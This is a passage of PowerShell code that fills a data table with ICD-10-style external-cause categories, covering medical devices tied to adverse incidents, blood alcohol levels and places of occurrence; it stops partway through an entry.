$DiagnosisList.Rows.Add("General hospital and personal-use devices associated with adverse incidents","Prosthetic and other implants, materials and accessory general hospital and personal-use devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("General hospital and personal-use devices associated with adverse incidents","Surgical instruments, materials and general hospital and personal-use devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("General hospital and personal-use devices associated with adverse incidents","Miscellaneous general hospital and personal-use devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Neurological devices associated with adverse incidents","Diagnostic and monitoring neurological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Neurological devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative neurological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Neurological devices associated with adverse incidents","Prosthetic and other implants, materials and neurological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Neurological devices associated with adverse incidents","Surgical instruments, materials and neurological devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Neurological devices associated with adverse incidents","Miscellaneous neurological devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Obstetric and gynecological devices associated with adverse incidents","Diagnostic and monitoring obstetric and gynecological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Obstetric and gynecological devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative obstetric and gynecological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Obstetric and gynecological devices associated with adverse incidents","Prosthetic and other implants, materials and accessory obstetric and gynecological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Obstetric and gynecological devices associated with adverse incidents","Surgical instruments, materials and obstetric and gynecological devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Obstetric and gynecological devices associated with adverse incidents","Miscellaneous obstetric and gynecological devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Ophthalmic devices associated with adverse incidents","Diagnostic and monitoring ophthalmic devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Ophthalmic devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative ophthalmic devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Ophthalmic devices associated with adverse incidents","Prosthetic and other implants, materials and accessory ophthalmic devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Ophthalmic devices associated with adverse incidents","Surgical instruments, materials and ophthalmic devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Ophthalmic devices associated with adverse incidents","Miscellaneous ophthalmic devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Radiological devices associated with adverse incidents","Diagnostic and monitoring radiological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Radiological devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative radiological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Radiological devices associated with adverse incidents","Prosthetic and other implants, materials and accessory radiological devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Radiological devices associated with adverse incidents","Surgical instruments, materials and radiological devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Radiological devices associated with adverse incidents","Miscellaneous radiological devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Orthopedic devices associated with adverse incidents","Diagnostic and monitoring orthopedic devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Orthopedic devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative orthopedic devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Orthopedic devices associated with adverse incidents","Prosthetic and other implants, materials and accessory orthopedic devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Orthopedic devices associated with adverse incidents","Surgical instruments, materials and orthopedic devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Orthopedic devices associated with adverse incidents","Miscellaneous orthopedic devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Physical medicine devices associated with adverse incidents","Diagnostic and monitoring physical medicine devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Physical medicine devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative physical medicine devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Physical medicine devices associated with adverse incidents","Prosthetic and other implants, materials and accessory physical medicine devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Physical medicine devices associated with adverse incidents","Surgical instruments, materials and physical medicine devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Physical medicine devices associated with adverse incidents","Miscellaneous physical medicine devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("General- and plastic-surgery devices associated with adverse incidents","Diagnostic and monitoring general- and plastic-surgery devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("General- and plastic-surgery devices associated with adverse incidents","Therapeutic (nonsurgical) and rehabilitative general- and plastic-surgery devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("General- and plastic-surgery devices associated with adverse incidents","Prosthetic and other implants, materials and accessory general- and plastic-surgery devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("General- and plastic-surgery devices associated with adverse incidents","Surgical instruments, materials and general- and plastic-surgery devices (including sutures) associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("General- and plastic-surgery devices associated with adverse incidents","Miscellaneous general- and plastic-surgery devices associated with adverse incidents, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other and unspecified medical devices associated with adverse incidents","Other medical devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Other and unspecified medical devices associated with adverse incidents","Unspecified medical devices associated with adverse incidents") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Surgical operation with transplant of whole organ as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Surgical operation with implant of artificial internal device as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Surgical operation with anastomosis, bypass or graft as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Surgical operation with formation of external stoma as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Other reconstructive surgery as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Amputation of limb(s) as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Removal of other organ (partial) (total) as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Surgical operation and other surgical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Surgical procedure, unspecified as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Cardiac catheterization as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Kidney dialysis as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Radiological procedure and radiotherapy as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Shock therapy as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Aspiration of fluid as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Insertion of gastric or duodenal sound as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Urinary catheterization as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Blood-sampling as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Other medical procedures as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure","Medical procedure, unspecified as the cause of abnormal reaction of the patient, or of later complication, without mention of misadventure at the time of the procedure") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of less than 20 mg/100 ml") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of 20-39 mg/100 ml") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of 40-59 mg/100 ml") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of 60-79 mg/100 ml") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of 80-99 mg/100 ml") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of 100-119 mg/100 ml") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of 120-199 mg/100 ml") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of 200-239 mg/100 ml") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Blood alcohol level of 240 mg/100 ml or more") + $null = $DiagnosisList.Rows.Add("Evidence of alcohol involvement determined by blood alcohol level","Presence of alcohol in blood, level not specified") + $null = $DiagnosisList.Rows.Add("Unspecified non-institutional (private) residence as the place of occurrence of the external cause","Kitchen of unspecified non-institutional (private) residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Unspecified non-institutional (private) residence as the place of occurrence of the external cause","Dining room of unspecified non-institutional (private) residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Unspecified non-institutional (private) residence as the place of occurrence of the external cause","Bathroom of unspecified non-institutional (private) residence single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Unspecified non-institutional (private) residence as the place of occurrence of the external cause","Bedroom of unspecified non-institutional (private) residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Unspecified non-institutional (private) residence as the place of occurrence of the external cause","Garden or yard of unspecified non-institutional (private) residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Unspecified non-institutional (private) residence as the place of occurrence of the external cause","Other place in unspecified non-institutional (private) residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Unspecified non-institutional (private) residence as the place of occurrence of the external cause","Unspecified place in unspecified non-institutional (private) residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Kitchen of single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Dining room of single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Bathroom of single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Bedroom of single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Private driveway to single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Private garage of single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Swimming-pool in single-family (private) house or garden as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Garden or yard in single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Other place in single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Single-family non-institutional (private) house as the place of occurrence of the external cause","Unspecified place in single-family (private) house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Kitchen in mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Dining room in mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Bathroom in mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Bedroom in mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Driveway of mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Garage of mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Swimming-pool of mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Garden or yard of mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Other place in mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Mobile home as the place of occurrence of the external cause","Unspecified place in mobile home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Apartment as the place of occurrence of the external cause","Kitchen in apartment as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Apartment as the place of occurrence of the external cause","Bathroom in apartment as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Apartment as the place of occurrence of the external cause","Bedroom in apartment as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Apartment as the place of occurrence of the external cause","Other place in apartment as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Apartment as the place of occurrence of the external cause","Unspecified place in apartment as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Kitchen in boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Bathroom in boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Bedroom in boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Driveway of boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Garage of boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Swimming-pool of boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Garden or yard of boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Other place in boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Boarding-house as the place of occurrence of the external cause","Unspecified place in boarding-house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Kitchen in other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Bathroom in other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Bedroom in other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Driveway of other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Garage of other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Swimming-pool of other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Garden or yard of other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Other place in other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other non-institutional residence as the place of occurrence of the external cause","Unspecified place in other non-institutional residence as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Institutional (nonprivate) residence as the place of occurrence of the external cause","Unspecified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Kitchen in children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Bathroom in children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Bedroom in children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Driveway of children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Garage of children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Swimming-pool of children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Garden or yard of children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Other place in children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Children's home and orphanage as the place of occurrence of the external cause","Unspecified place in children's home and orphanage as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Kitchen in nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Bathroom in nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Bedroom in nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Driveway of nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Garage of nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Swimming-pool of nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Garden or yard of nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Other place in nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Nursing home as the place of occurrence of the external cause","Unspecified place in nursing home as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military base as the place of occurrence of the external cause","Kitchen on military base as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military base as the place of occurrence of the external cause","Mess hall on military base as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military base as the place of occurrence of the external cause","Barracks on military base as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military base as the place of occurrence of the external cause","Garage on military base as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military base as the place of occurrence of the external cause","Swimming-pool on military base as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military base as the place of occurrence of the external cause","Garden or yard on military base as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military base as the place of occurrence of the external cause","Other place on military base as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military base as the place of occurrence of the external cause","Unspecified place military base as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Prison as the place of occurrence of the external cause","Kitchen in prison as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Prison as the place of occurrence of the external cause","Dining room in prison as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Prison as the place of occurrence of the external cause","Bathroom in prison as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Prison as the place of occurrence of the external cause","Cell of prison as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Prison as the place of occurrence of the external cause","Swimming-pool of prison as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Prison as the place of occurrence of the external cause","Courtyard of prison as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Prison as the place of occurrence of the external cause","Other place in prison as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Prison as the place of occurrence of the external cause","Unspecified place in prison as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Kitchen in reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Dining room in reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Bathroom in reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Bedroom in reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Driveway of reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Garage of reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Swimming-pool of reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Garden or yard of reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Other place in reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Reform school as the place of occurrence of the external cause","Unspecified place in reform school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School dormitory as the place of occurrence of the external cause","Kitchen in school dormitory as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School dormitory as the place of occurrence of the external cause","Dining room in school dormitory as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School dormitory as the place of occurrence of the external cause","Bathroom in school dormitory as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School dormitory as the place of occurrence of the external cause","Bedroom in school dormitory as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School dormitory as the place of occurrence of the external cause","Other place in school dormitory as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School dormitory as the place of occurrence of the external cause","Unspecified place in school dormitory as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Kitchen in other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Dining room in other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Bathroom in other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Bedroom in other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Driveway of other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Garage of other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Pool of other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Garden or yard of other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Other place in other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified residential institution as the place of occurrence of the external cause","Unspecified place in other specified residential institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School (private) (public) (state) as the place of occurrence of the external cause","Daycare center as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School (private) (public) (state) as the place of occurrence of the external cause","Elementary school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School (private) (public) (state) as the place of occurrence of the external cause","Middle school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School (private) (public) (state) as the place of occurrence of the external cause","High school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School (private) (public) (state) as the place of occurrence of the external cause","College as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School (private) (public) (state) as the place of occurrence of the external cause","Trade school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School (private) (public) (state) as the place of occurrence of the external cause","Other school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("School (private) (public) (state) as the place of occurrence of the external cause","Unspecified school as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Religious institution as the place of occurrence of the external cause","Religious institution as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Hospital as the place of occurrence of the external cause","Patient room in hospital as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Hospital as the place of occurrence of the external cause","Patient bathroom in hospital as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Hospital as the place of occurrence of the external cause","Corridor of hospital as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Hospital as the place of occurrence of the external cause","Cafeteria of hospital as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Hospital as the place of occurrence of the external cause","Operating room of hospital as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Hospital as the place of occurrence of the external cause","Other place in hospital as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Hospital as the place of occurrence of the external cause","Unspecified place in hospital as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Public administrative building as the place of occurrence of the external cause","Courthouse as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Public administrative building as the place of occurrence of the external cause","Library as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Public administrative building as the place of occurrence of the external cause","Post office as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Public administrative building as the place of occurrence of the external cause","City hall as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Public administrative building as the place of occurrence of the external cause","Other public administrative building as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Cultural building as the place of occurrence of the external cause","Art Gallery as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Cultural building as the place of occurrence of the external cause","Museum as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Cultural building as the place of occurrence of the external cause","Music hall as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Cultural building as the place of occurrence of the external cause","Opera house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Cultural building as the place of occurrence of the external cause","Theater (live) as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Cultural building as the place of occurrence of the external cause","Other cultural public building as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Movie house or cinema as the place of occurrence of the external cause","Movie house or cinema as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified public building as the place of occurrence of the external cause","Other specified public building as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Athletic court as the place of occurrence of 